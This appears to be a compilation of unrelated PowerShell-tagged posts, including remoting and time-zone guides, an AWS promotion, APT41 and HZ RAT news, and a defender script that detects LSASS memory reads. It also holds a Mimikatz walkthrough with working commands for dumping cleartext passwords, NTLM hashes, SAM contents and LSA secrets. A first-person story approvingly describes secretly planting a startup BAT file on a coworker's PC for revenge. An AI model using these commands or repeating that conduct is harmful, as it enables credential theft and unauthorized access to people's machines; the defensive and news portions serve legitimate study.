#PowerShell Remote Commands
Enter-PSSession: Run PowerShell Remote Commands
@vexpert #vmwarecommunities #100daysofhomelab #homelab #PowerShellRemotingBasics #EnterPSSessionCommands #PowerShellRemoteServer #RemoteSystemManagement #WindowsServerPowerShell #NewPSSessionUsage
Windows PowerShell has changed how we manage our Windows Server environments. One of the powerful features of PowerShell is PowerShell remoting, which enables the execution of PowerShell commands or scripts on a remote computer. The Enter-PSSession command, a core part of PowerShell remoting, allows us to establish an interactive session with a remote system, fundamentally changing how we…
#Enter-PSSession Commands#Managing Remote Computers#New-PSSession Usage#PowerShell Remote Commands#PowerShell Remote Server#PowerShell Remoting Basics#PowerShell Session Configuration#Remote System Management#Windows Server PowerShell#WinRM Service Guide
Gaining Windows Credentialed Access Using Mimikatz and WCE
Prerequisites & Requirements
In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:
Kali Linux
Parrot OS
The following is a list of recommended technical prerequisites that you will need in order to get the most out of this course:
Familiarity with Linux system administration.
Familiarity with Windows.
Functional knowledge of TCP/IP.
Familiarity with penetration testing concepts and life-cycle.
Note: The techniques and tools used in this document were performed on a Kali Linux 2021.2 virtual machine.
MITRE ATT&CK Credential Access Techniques
Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include: keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.
The techniques outlined under the Credential Access tactic provide us with a clear and methodical way of extracting credentials and hashes from memory on a target system.
The following is a list of the key techniques and sub-techniques that we will be exploring:
Dumping the SAM database.
Extracting clear-text passwords and NTLM hashes from memory.
Dumping LSA Secrets.
Scenario
Our objective is to extract credentials and hashes from memory on the target system after we have obtained an initial foothold. In this case, we will be taking a look at how to extract credentials and hashes with Mimikatz.
Note: We will be looking at how to use Mimikatz with Empire; however, the same techniques can also be replicated with Meterpreter or other listeners, as the Mimikatz syntax is universal.
Meterpreter is a Metasploit payload that provides attackers with an interactive shell that can be used to run commands, navigate the filesystem, and download or upload files to and from the target system.
Credential Access With Mimikatz
Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.
The SAM (Security Account Manager) database is a database file on Windows systems that stores users' passwords and can be used to authenticate users both locally and remotely.
The Mimikatz codebase is located at https://github.com/gentilkiwi/mimikatz/, and there is also an expanded wiki at https://github.com/gentilkiwi/mimikatz/wiki.
In order to extract cleartext passwords and hashes from memory on a target system, we will need an Empire agent with elevated privileges.
Extracting Cleartext Passwords & Hashes From Memory
Empire uses an adapted version of PowerSploit’s Invoke-Mimikatz function written by Joseph Bialek to execute Mimikatz functionality in PowerShell without touching disk.
PowerSploit is a collection of PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
Empire can take advantage of nearly all Mimikatz functionality through PowerSploit’s Invoke-Mimikatz module.
We can invoke the Mimikatz prompt on the target agent by following the procedures outlined below.
The first step in the process involves interacting with your high-integrity agent; this can be done by running the following command in the Empire client:
interact <AGENT-ID>/<NAME>
The next step is to invoke Mimikatz from the agent shell; this can be done by running the following command:
mimikatz
This will invoke Mimikatz on the target system and you should be able to interact with the Mimikatz prompt.
Before we take a look at how to dump cleartext credentials from memory with Mimikatz, you should confirm that you have the privileges required by the various Mimikatz features. This can be done by running the following command in the Mimikatz prompt:
mimikatz # privilege::debug
If you have the correct privileges you should receive the message “Privilege ‘20’ OK” as shown in the following screenshot.
We can now extract cleartext passwords from memory with Mimikatz by running the following command in the Mimikatz prompt:
mimikatz # sekurlsa::logonpasswords
If successful, Mimikatz will output a list of cleartext passwords for user accounts and service accounts as shown in the following screenshot.
In this scenario, we were able to obtain the cleartext password for the Administrator user as well as the NTLM hash.
NTLM is the default hash format used by Windows to store passwords.
Dumping SAM Database
We can also dump the contents of the SAM (Security Account Manager) database with Mimikatz; this process also requires an agent with administrative privileges.
The Security Account Manager (SAM) is a database file used on modern Windows systems and is used to store user account passwords. It can be used to authenticate local and remote users.
We can dump the contents of the SAM database on the target system by running the following command in the Mimikatz prompt:
mimikatz # lsadump::sam
If successful, Mimikatz will output the contents of the SAM database as shown in the following screenshot.
As highlighted in the previous screenshot, the SAM database contains the user accounts and their respective NTLM hashes.
LSA Secrets
Mimikatz also has the ability to dump LSA Secrets. LSA Secrets is a storage location used by the Local Security Authority (LSA) on Windows.
You can learn more about LSA and how it works here: https://networkencyclopedia.com/local-security-authority-lsa/
The purpose of the Local Security Authority is to manage a system's local security policy; as a result, it typically stores data pertaining to user accounts, such as user logins, user authentication data, and LSA secrets, among other things. Note that this technique also requires an agent with elevated privileges.
We can dump LSA Secrets on the target system by running the following command in the Mimikatz prompt:
mimikatz # lsadump::secrets
If successful, Mimikatz will output the LSA Secrets on the target system as shown in the following screenshot.
So far, we have been able to extract both cleartext credentials and NTLM hashes for all the user and service accounts on the system. These credentials and hashes will come in handy when we explore lateral movement techniques and how we can legitimately authenticate to the target system with the credentials and hashes we have extracted.
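As an added, defender-side example (not part of the original post, and not Mimikatz, Empire or PowerSploit code), the script below shows how the two steps above, privilege::debug and sekurlsa::logonpasswords, look in host telemetry and how to flag them. It runs over constructed JSON-lines records shaped like Windows Security Event 4703 ("A user right was adjusted") and Sysmon Event ID 10 (ProcessAccess); the field names follow those two events, while the paths, PIDs, user names and the MsMpEng.exe allowlist entry are assumptions made for the example.

```python
"""Detection of the privilege::debug -> sekurlsa::logonpasswords sequence in host
telemetry.  Added example, not code from the original post, Mimikatz or Empire.
Input is constructed JSON-lines telemetry: Windows Security Event 4703 ("A user
right was adjusted") and Sysmon Event ID 10 (ProcessAccess).  Field names follow
those events; every path, PID and user name below is made up for this example."""
import json
import re
from collections import defaultdict

# Win32 process access-right bits relevant to reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
ACCESS_NAMES = {
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_QUERY_INFORMATION: "PROCESS_QUERY_INFORMATION",
    PROCESS_QUERY_LIMITED_INFORMATION: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Assumed allowlist of images that legitimately read LSASS on this fleet
# (a real deployment tunes this to its own AV/EDR); lower-cased full paths.
EXPECTED_LSASS_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample telemetry.  Raw string, so the JSON "\\" escapes survive.
SAMPLE_EVENTS = r"""
{"EventID": 4703, "ProcessId": 4412, "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "SubjectUserName": "jdoe", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 10, "SourceProcessId": 3200, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceProcessId": 4412, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceProcessId": 900, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "SourceProcessId": 5100, "SourceImage": "C:\\Windows\\System32\\notepad.exe", "TargetImage": "C:\\Windows\\explorer.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 4703, "ProcessId": 6000, "ProcessName": "C:\\Windows\\System32\\taskhostw.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeBackupPrivilege"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_lsass(image):
    return image.lower().endswith("\\lsass.exe")


def debug_privilege_enabled(event):
    """Security 4703: a process enabled SeDebugPrivilege, which is what
    privilege::debug does.  Returns (pid, reason) or None."""
    if event.get("EventID") != 4703:
        return None
    privileges = re.split(r"[\s,]+", event.get("EnabledPrivilegeList", ""))
    if "SeDebugPrivilege" not in privileges:
        return None
    return (event["ProcessId"],
            f"{event['ProcessName']} enabled SeDebugPrivilege as {event['SubjectUserName']}")


def lsass_memory_read(event):
    """Sysmon 10: a non-allowlisted process opened lsass.exe with PROCESS_VM_READ,
    the right sekurlsa::logonpasswords needs.  Returns (pid, reason) or None."""
    if event.get("EventID") != 10 or not is_lsass(event.get("TargetImage", "")):
        return None
    granted = int(event["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ:
        return None  # query-only handles cannot read credential material
    source = event.get("SourceImage", "")
    if source.lower() in EXPECTED_LSASS_READERS:
        return None
    names = "|".join(n for bit, n in ACCESS_NAMES.items() if granted & bit)
    return (event["SourceProcessId"],
            f"{source} read LSASS memory (GrantedAccess {event['GrantedAccess']}: {names})")


def scan(text):
    """Map each process id that tripped a check to the list of reasons."""
    hits = defaultdict(list)
    for event in parse_events(text):
        for check in (debug_privilege_enabled, lsass_memory_read):
            hit = check(event)
            if hit:
                hits[hit[0]].append(hit[1])
    return dict(hits)


def severity(reasons):
    """'high' when one process both enabled SeDebugPrivilege and read LSASS (the
    full sequence from the post); 'medium' for either signal on its own."""
    got_debug = any("SeDebugPrivilege" in r for r in reasons)
    got_read = any("read LSASS memory" in r for r in reasons)
    return "high" if got_debug and got_read else "medium"


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(f"[{severity(reasons)}] pid {pid}")
        for reason in reasons:
            print("    " + reason)
```

Run it directly to print the verdicts. The PROCESS_VM_READ bit is the discriminating signal: lsass.exe is opened constantly for query-only access by svchost and similar system processes, so alerting on every handle is noise, but a non-allowlisted process that obtains VM_READ on lsass.exe, and did so right after enabling SeDebugPrivilege, is exactly the sequence the post walks through. Event 4703 is noisy on its own, which is why severity only rates a hit high when the same PID also read LSASS memory.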
I'm having to train a replacement at my IT job (I told them I was leaving before he was hired, and they asked nicely) and genuinely it makes me afraid.
Long story below the break
I'm a software engineering major. I understand I probably have a significantly higher technical knowledge of a lot of things than most people ever should (nobody who isn't getting paid for it should have to deal with Windows PowerShell). And not in an XKCD "most people only know a few command line commands" way but as in "I worked the front lines helping 70 year old professors who never used a computer in their life before covid forced them to teach remotely set up Zoom". I am intimately familiar with how little most people know about computers.
But you see, I do have what I consider a basic knowledge that I expect someone to know if they're in tech. Fellow IT workers and programmers just need to know these things to do our jobs effectively.
So, when the guy I'm training searches "Google" on his browser's address bar, clicks on the google link on the google search page, and then pastes the URL he had copied to his clipboard INTO THE GOOGLE SEARCH instead of, ya know, using a web browser normally. I get concerned.
Because, see, it's not even that he's a business or horticulture or any unrelated major who's working IT just to pay for college. Happens all the time with student positions, and we're more than happy to help these guys learn more about tech and help send some more power users into their fields.
No, he is a software engineering major. Just a year behind me. I know what courses he's taken, because I've taken them. He should know better. He's not a bad programmer either, I've seen some of his work. He has written websites from scratch. But cannot navigate a web browser to save his life.
And I realized in that moment, that singular moment, why all those 100 level courses I took that I hated because I fell asleep in them, why they were important. Because this knowledge, at least in my university, just isn't being passed down. "Intro to Computing" taught him what a mouse and keyboard are, why a monitor is useful, and gave him a basic cursory glance at the different parts of a PC internally.
But nobody explained to him what a URL is. Or what different parts of a web browser actually do. They jumped straight into code, giving him hardlinks to follow and step by step guides to set everything up, without really explaining what he was doing or why until his dev environment is setup and he's writing code. He can use keyboard shortcuts and command lines like the rest of em. But he doesn't know what the Chrome address bar is, that it's connected directly to google anyways, or that he can put URLs into it to get to websites directly.
I'm terrified. That it's even remotely possible that someone who is paid to be giving tech advice to others at a major institution can be missing these key skills.
To be clear, I don't think we're in danger of losing important fundamental tech knowledge yet. There's good learning resources out there and people who are working to expand this knowledge and preserve it. And we should share them with more people. My grandmother enjoyed showing her yarnworking group how to use a pattern database website she'd found, and they're all deeply entrenched in new fun projects using patterns they found on Ravelry.com
But knowing who to trust for information on the internet is crucial for your own and others' safety. And the fact that someone hoping to go into working on the very fabric that underpins the information superhighway doesn't know how to change lanes or read a map? Means who we trust when asking tech questions is even more important, especially with the rising prevalence of "AI" information, which is just wrong. The machine we built to guess how to end sentences makes up lies. Wow. I can't believe my phone autocorrect we trained on stolen books and almost every word ever written on the internet without anyone's consent doesn't correctly write a program to pilot a rocket.
I'm rambling now. But maybe if you do know what I'm talking about, reach out to someone who could benefit from a little more computer knowledge and show them in a fun way how a web browser works. We all benefit from increased computer literacy.
this can't be true can it
#journal#god dont get me started on “”AI“”#the amount of lies and unethical business and general misinformation surrounding it#fuck Im so mad#it's ruining my industry#ask box is open if anyone wants to prompt a seperate post about this#i will vent about how shitty it is
Discover AWS Systems Manager Cross-Account Management
What is AWS Systems Manager?
AWS Systems Manager is a solution that facilitates the management, viewing, and control of your infrastructure in multicloud, on-premises, and AWS settings.
AWS Systems Manager’s advantages
Boost visibility throughout your whole node infrastructure
A consolidated view of all the nodes across the accounts and regions of your company is offered by AWS Systems Manager. Get node information quickly, including its name, ID, installed agents, operating system information, and tags. You may find problems and act more quickly by using Amazon Q Developer to query node metadata in natural language.
Use automation to increase operational efficiency
Reduce the time and effort needed to maintain your systems by automating routine operational chores. Systems Manager eliminates the need for remote PowerShell, SSH, or bastion hosts by enabling you to safely and securely manage your nodes at scale without logging into your servers. It offers a straightforward method for automating routine operational tasks, like software and patch installations, registry modifications, and user administration, across groups of nodes.
Make node management easier at scale in any setting
Any AWS, on-premises, or multicloud environment can run the Systems Manager Agent (SSM Agent), enabling Systems Manager to offer out-of-the-box visibility and simplifying managed node maintenance. Set up diagnostics to run automatically in order to find problems with the SSM Agent; issues can then be fixed with pre-defined runbooks. Once under control, nodes can efficiently carry out vital operational functions, including remotely executing commands, starting logged sessions, and patching nodes with security updates.
Tools
You can use the entire suite of AWS Systems Manager tools to securely connect to nodes without managing bastion hosts or SSH keys, patch nodes with security updates, automate operational commands at scale, and obtain thorough fleet visibility once your nodes are managed by Systems Manager.
Use cases
Control every node you have
Gain thorough insight into your hybrid and multicloud systems, as well as your node infrastructure across Amazon Web Services accounts and regions. Rapidly detect and resolve agent problems to restore unmanaged nodes and efficiently carry out crucial operational duties, such as applying security updates to nodes, starting and recording sessions, or executing operational commands.
Automate your processes
Make your computational resources available, configure them, and deploy them automatically. To address common problems like misconfigured agents, keep infrastructure up to date with SSM Agent diagnosis and remediation. Execute essential operational activities, like automatically applying fixes for applications and operating systems on a regular basis.
Increase the effectiveness of operations
Prioritize increasing operational effectiveness, cutting expenses, and growing your company. Across your hybrid and multicloud setups, AWS Systems Manager is your enterprise-grade solution for managing nodes at scale with cross-account and cross-region visibility.
Presenting a fresh AWS Systems Manager experience
AWS is presenting an enhanced version of AWS Systems Manager today, which offers the much-desired cross-account and cross-region experience for large-scale node management.
All of your managed nodes, including different kinds of infrastructure like Amazon Elastic Compute Cloud (EC2) instances, containers, virtual machines on other cloud providers, on-premises servers, and edge Internet of Things (IoT) devices, can be seen centrally with the new Systems Manager experience. When they are linked to Systems Manager and have the Systems Manager Agent (SSM Agent) installed, they are called "managed nodes."
A node is referred to as an "unmanaged node" if the SSM Agent stops running on it for any reason, at which point Systems Manager no longer has access to it. The latest version of Systems Manager also makes it easier to find and troubleshoot unmanaged nodes. To resolve any problems and restore connectivity so they can once more be managed nodes, you may run and even schedule an automated diagnosis that gives you suggested runbooks to follow.
Amazon Q Developer, the generative AI-powered software development assistant, has also been integrated with Systems Manager. Using natural language, you may ask Amazon Q Developer questions about the nodes you manage. You'll receive quick answers and links into Systems Manager where you can take action or carry out more research.
With the new interface with Systems Manager in this edition, you can also leverage AWS Organizations to enable a delegated administrator to centrally manage nodes throughout the business.
AWS Systems Manager pricing
You can monitor and fix operational problems with all of your AWS applications and resources, including Amazon Elastic Compute Cloud (EC2), Amazon Relational Database Service (RDS), Amazon Elastic Container Service (ECS), and Amazon Elastic Kubernetes Service (EKS) instances, as well as in multicloud and hybrid environments, using the unified user interface that AWS Systems Manager offers. With AWS Systems Manager, you may begin using the benefits of the AWS Free Tier without paying a dime. No upfront obligations or minimum costs apply. There may be restrictions.
AWS Free Tier
The following functionalities of AWS Systems Manager are available to you for free as part of the AWS Free Tier. There may be restrictions.
Explorer
Enabling Explorer does not incur any further fees. There may be restrictions.
The dashboard of Explorer is populated by paid OpsCenter APIs (GetOpsSummary). These API queries will incur fees. The Export to CSV option uses an aws:executeScript action step to run an Automation document. The cost of these actions may be determined by Automation pricing.
For more details please visit the AWS systems manager pricing page.
In conclusion
Gaining visibility and control over your computing infrastructure and carrying out operational tasks at scale requires Systems Manager. Through a centralized dashboard, the new experience provides a single view of all your nodes across AWS accounts, on-premises, and multicloud environments. It also integrates Amazon Q Developer for natural language queries and allows one-click SSM Agent troubleshooting. By going to the Systems Manager console and following the simple steps, you may activate the new experience without paying more.
Read more on govindhtech.com
#DiscoverAWSSystems#ManagerCross#Tools#AccountManagement#AmazonQDeveloper#AmazonWebServices#AmazonElasticComputeCloud#virtualmachines#AmazonRelationalDatabaseService#RDS#technology#technews#news#govindhtech
What The Shell?: Part 1 | TryHackMe
An introduction to sending and receiving (reverse/bind) shells when exploiting target machines. Task 1: What is a shell? Shells are what we use when interfacing with a command line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and PowerShell on Windows. When targeting remote systems it is sometimes possible to force an…
Living Up to my Persona
I make a big thing about being a spirit of chaos bottled up in failing human meat, but the thing is, operating in civil society means keeping your limiters and blinkers on, so to speak. I don't exactly get to go ham on the occasional dealership's bigots or douchebags, but when I do...
See, Walt's the verbal type. Sarah's the snippy one when it comes to defending the polycule and me? Well, I know I'd fold in two with a stiff breeze. I can't punch up to save my life, my meatware decides that stammering is extra cool when it comes to actually giving lip to someone when I'm not hiding behind a headset - so I attack the best way I can: using tech to do my dirty work.
A few weeks into our company's existence, I'm doing in-person work at a dealership whose staff I utterly loathe for how contemptuous they are for their own client base and for all external collaborators (the constructor's name obviously ends with a "Benz"), and one of the Sales reps lands just one too many biphobic and discriminatory comments concerning my disability. So, using SSH, I term into his desktop while working on their central database, and drop the following into a custom BAT file I hide in the depths of Windows' System32 folder:
@echo off
:: Generate a random number between 1 and 100
set /a X=%random% * 100 / 32768 + 1
:: Use PowerShell to display a message box with the random number
powershell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Hey, Mike! Looks like you did %X% pushups today! Nice job!', 'Pushup Tracker')"
exit
A few more keystrokes in Windows' Run program gets me access to the Startup folder (God bless Admin rights) and I set my BAT file to run with every Windows boot-up sequence. Mike, in this case, knows as much about Windows' architecture as your average fruit fly.
He will never find my little gift, and will drive their own swamped and chronically non-available Level 1 tech absolutely fucking bugnuts, as per later testimonies. As, after all, it's just a Batch file - not a virus. From their end of things, everything is copacetic.
Fast-forward a few months, and being hounded by a mocking Windows message window seems to be enough for Mike to go from a self-obsessed would-be Sigma to a snivelling little runt who puffs up in front of customers but who realizes he's entirely dependent on us to meet his Sales targets...
And Walt knows I like it like that. I smile, nod, wave off Mike's earlier homophobia - but if I wanted? I could access that BAT file and make it much, much more malicious.
I might remove it remotely in a few months. It's been long enough as it is - but I want to be sure. Wouldn't want Mikey to get an excessive surge of homophobic self-confidence again...
APT41 Targets Taiwanese Government Research Institute with ShadowPad and Cobalt Strike
Cisco Talos researchers have reported a significant cyber attack on a Taiwanese government-affiliated research institute, attributing the breach to the China-linked group APT41 with medium confidence. The campaign began as early as July 2023 and involved deploying advanced malware tools including ShadowPad and Cobalt Strike.
Attack Overview and Attribution
The researchers identified several key aspects of the attack:
- The campaign targeted a Taiwanese government-affiliated research institute
- APT41, a group allegedly comprised of Chinese nationals, is believed to be responsible
- Attribution is based on overlaps in tactics, techniques, and procedures (TTPs), infrastructure, and malware families exclusive to Chinese APT groups
ShadowPad Malware Deployment
A central component of the attack was the use of ShadowPad, a sophisticated modular remote access trojan (RAT):
- ShadowPad is known to be sold exclusively to Chinese hacking groups
- The malware exploited an outdated vulnerable version of the Microsoft Office IME binary as a loader
- A customized second-stage loader was used to launch the payload
- Two distinct iterations of ShadowPad were encountered during the investigation
Cobalt Strike and Custom Loaders
The attackers also leveraged Cobalt Strike and developed custom loaders to evade detection:
- A unique Cobalt Strike loader written in GoLang was used to bypass Windows Defender
- The loader was derived from an anti-AV tool called CS-Avoid-Killing, found on GitHub
- Simplified Chinese file and directory paths suggest the attackers' proficiency in the language
- PowerShell commands were used to execute scripts for running ShadowPad directly in memory and fetching Cobalt Strike from command and control (C2) servers
The GitHub repository of the Cobalt Strike loader.
Exploitation of CVE-2018-0824
APT41 demonstrated advanced capabilities by exploiting a known vulnerability:
- The group created a custom loader to inject a proof-of-concept for CVE-2018-0824 directly into memory
- This remote code execution vulnerability was used to achieve local privilege escalation
- A tool called UnmarshalPwn was employed in the exploitation process
Attack Methodology and Persistence
The attackers employed various techniques to maintain access and avoid detection:
- Three hosts in the targeted environment were compromised
- Documents were exfiltrated from the network
- A web shell was used to maintain persistence and drop additional payloads
- The "quser" command was executed to monitor for other logged-on users, allowing the attackers to pause activities if detected
- After deploying backdoors, the web shell and guest account used for initial access were deleted
Broader Implications and Ongoing Investigations
Cisco Talos researchers emphasized the potential for further discoveries:
- Analysis of artifacts from this campaign led to the identification of samples and infrastructure potentially used in different campaigns
- Sharing these findings could help the cybersecurity community make connections and enhance ongoing investigations
- Indicators of Compromise (IoCs) for this campaign have been released on Cisco Talos' GitHub repository
This sophisticated cyber attack on a Taiwanese government research institute highlights the ongoing threat posed by advanced persistent threat (APT) groups like APT41. Complex malware such as ShadowPad, combined with custom loaders and exploitation of known vulnerabilities, demonstrates the evolving tactics employed by state-sponsored threat actors.
MacOS Users Beware! The HZ RAT Spy Software Targeting DingTalk and WeChat Exposed
With the rapid development of information technology, network security issues are becoming increasingly prominent. Especially malicious software attacks targeting enterprise-level communication tools are gradually becoming new security challenges. Recently, Kaspersky Lab released a report revealing that a new type of malicious software called HZ RAT is launching large-scale espionage activities against DingTalk and WeChat users on the MacOS platform. This news quickly attracted high attention from the industry.
HZ RAT is a backdoor malicious software initially discovered by the German cybersecurity company DCSO in November 2022. This malicious software is mainly spread through self-extracting zip files or malicious RTF documents. The latter exploits a vulnerability (CVE-2017-11882) that has existed in Microsoft Office for many years. In addition to the traditional Windows platform, the developers of HZ RAT clearly have not ignored the growth potential of the MacOS user group. They have specially designed a version suitable for the MacOS system, enabling this malicious software to run rampant on different operating systems.
According to the discovery of Kaspersky researcher Sergey Puzan, the functions of the HZ RAT MacOS version are similar to those of the Windows version. The difference lies in that it relies on receiving instructions through shell scripts issued by a remote server. This means that whether it is a Windows or MacOS user, once infected with HZ RAT, the attacker can easily remotely control the victim device through the Command and Control (C2) server. HZ RAT can perform a series of dangerous operations, including but not limited to executing PowerShell commands, writing arbitrary files, uploading files to the server, and regularly sending heartbeat information to confirm the status of the target device. These functions make HZ RAT very suitable for stealing credentials and conducting system reconnaissance.
It is worth noting that one of the spreading methods of the HZ RAT MacOS version is to disguise itself as an installation package of a legitimate application, such as OpenVPN Connect. When a user installs this disguised software, the malicious software will establish a connection with the C2 server and start to perform its malicious tasks. Worryingly, HZ RAT can not only extract sensitive information such as WeChat ID, email address, and phone number from DingTalk and WeChat but also obtain more information about the user's organization.
The emergence of the HZ RAT MacOS version indicates that the previous attackers are still active and are constantly evolving their attack methods. Although the main goal of these malicious software currently seems to be to collect user data, considering its lateral movement capabilities, future threats may become more complex and dangerous.
At the same time, this espionage activity targeting MacOS users has once again triggered trust issues about network security products. Looking back at history, the U.S. government once included the products of the Russian cybersecurity giant Kaspersky Lab on the banned sales list due to national security considerations. Now, similar concerns seem to be surrounding Chinese cybersecurity companies. At the beginning of 2024, the U.S. Department of Commerce announced that it added the Chinese cybersecurity enterprise Knownsec to its entity list, restricting its business activities in the U.S. market. This measure is undoubtedly another impact on the global cybersecurity landscape. It not only affects the international business of related enterprises but also triggers extensive discussions about technological autonomy and information security guarantees.
Whether it is the continuous threat of HZ RAT or the frictions generated by international technological competition, they are all reminding us of the importance of network security and the complex situation it faces. In the face of evolving network threats, enterprises and individuals should be more vigilant and strengthen their self-protection awareness. At the same time, governments and enterprises of all countries also need to strengthen cooperation to jointly build a more solid network defense line to ensure the security and stability of the information age.
Enable WinRM on Windows Servers and Windows PCs
In this article, we shall discuss how to enable WinRM on Windows Servers and Windows PCs. Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers. PowerShell remoting is similar to SSH used in accessing remote computers. Please see how to…
How to Set Time Zone Using PowerShell: A Step-by-Step Guide
When managing a Remote Desktop Protocol (RDP) server, ensuring that the time zone is correctly set is crucial for maintaining synchronization and avoiding time-related issues. Whether you’re using a free RDP server or have decided to buy RDP services, this guide will walk you through the process of setting the time zone using PowerShell. Follow these steps to ensure your Windows RDP environment is accurately configured.
Understanding the Importance of Setting the Correct Time Zone
Preparing Your Windows RDP Server
Before you begin, make sure you have administrative access to the Windows RDP server. PowerShell is a powerful tool that requires appropriate permissions to make system changes. Whether you’re using a free RDP server or a paid one, administrative rights are a prerequisite for the steps outlined below.
Step-by-Step Guide to Setting the Time Zone Using PowerShell
Step 1: Open PowerShell
First, log into your Windows RDP server. If you’re using an RDP client, connect to your server using the appropriate credentials. Once logged in, open PowerShell with administrative privileges. You can do this by searching for PowerShell in the start menu, right-clicking on it, and selecting “Run as administrator”.
Step 2: Check the Current Time Zone
Before making any changes, it’s a good idea to check the current time zone setting on your RDP server. Use the following command in PowerShell:
Get-TimeZone
This command will display the current time zone configured on your Windows RDP server. This is especially useful if you’re troubleshooting time zone-related issues on a free RDP server or one that you recently bought.
Step 3: List Available Time Zones
To see every time zone Windows recognises, run the following command:
Get-TimeZone -ListAvailable
This command will output a list of all time zones that your Windows RDP server supports. Review this list to find the appropriate time zone for your needs. Whether you’re managing a free RDP server or a commercial one, this list is comprehensive and covers all possible configurations.
Step 4: Set the Desired Time Zone
Once you have identified the correct time zone, you can set it using the Set-TimeZone cmdlet. For example, if you want to set the time zone to "Pacific Standard Time", use the following command:
Set-TimeZone -Name "Pacific Standard Time"
Ensure that you replace “Pacific Standard Time” with the exact name of the time zone you want to set, as listed by the Get-TimeZone -ListAvailable command. This step is the same regardless of whether you're configuring a free RDP server or one you've opted to buy RDP access for.
Step 5: Verify the Change
After setting the new time zone, it’s important to verify that the change has been applied correctly. Use the Get-TimeZone command again to check the current time zone:
Get-TimeZone
This confirmation step ensures that your Windows RDP server is now operating in the correct time zone. It’s a quick and effective way to double-check your work, whether you’re managing a free RDP server or a purchased one.
Troubleshooting Common Issues
Even though setting the time zone on your Windows RDP server is generally straightforward, you might encounter some issues. Here are a few common problems and how to solve them:
Insufficient Permissions: Ensure you are running PowerShell as an administrator. Without administrative privileges, you won’t be able to change the time zone.
Incorrect Time Zone Name: If you receive an error stating the time zone name is incorrect, double-check the list provided by the Get-TimeZone -ListAvailable command to ensure you have the correct name.
Sync Issues: After setting the time zone, if you still face synchronization issues, check other related settings such as the system clock and time synchronization settings on your RDP server.
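The steps above and the three troubleshooting items can be folded into one function, shown here as an added example that is not part of the original guide. Set-VerifiedTimeZone is a hypothetical helper name; it uses only the Get-TimeZone and Set-TimeZone cmdlets the guide describes, checks elevation first, validates the name against Get-TimeZone -ListAvailable, and reads the setting back after the change.

```powershell
# Added example (not from the original guide). Set-VerifiedTimeZone is a hypothetical name.
function Set-VerifiedTimeZone {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)]
        [string]$Name   # a time zone Id such as "Pacific Standard Time"
    )

    # Insufficient permissions: Set-TimeZone needs an elevated session, so fail early with a clear message.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        throw "Set-TimeZone requires an elevated PowerShell session (Run as administrator)."
    }

    # Incorrect time zone name: validate against the list Windows actually supports before
    # calling Set-TimeZone. The match is case-sensitive so near-misses are reported, with hints.
    $available = Get-TimeZone -ListAvailable
    $match = $available | Where-Object { $_.Id -ceq $Name }
    if (-not $match) {
        $hints = $available |
            Where-Object { $_.Id -like "*$Name*" -or $_.DisplayName -like "*$Name*" } |
            Select-Object -First 5 -ExpandProperty Id
        $msg = "'$Name' is not a valid time zone Id."
        if ($hints) { $msg += " Did you mean: $($hints -join ', ')?" }
        throw $msg
    }

    # Nothing to do if the server is already in the requested zone.
    $before = Get-TimeZone
    if ($before.Id -ceq $Name) {
        Write-Verbose "Time zone is already '$Name'; no change made."
        return $before
    }

    # -WhatIf / -Confirm support comes from SupportsShouldProcess.
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, "Change time zone from '$($before.Id)' to '$Name'")) {
        Set-TimeZone -Id $Name

        # Verify: read the setting back rather than trusting that the call succeeded.
        $after = Get-TimeZone
        if ($after.Id -cne $Name) {
            throw "Verification failed: expected '$Name' but Get-TimeZone reports '$($after.Id)'."
        }
        Write-Verbose "Time zone changed from '$($before.Id)' to '$($after.Id)'."
        return $after
    }
}

# Usage from an elevated prompt; -WhatIf previews the change without applying it:
# Set-VerifiedTimeZone -Name "Pacific Standard Time" -WhatIf
# Set-VerifiedTimeZone -Name "Pacific Standard Time" -Verbose
```

The function sets the zone by -Id rather than -Name because Id is the value Get-TimeZone -ListAvailable reports and validates against; for "Pacific Standard Time" the two coincide.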
Conclusion
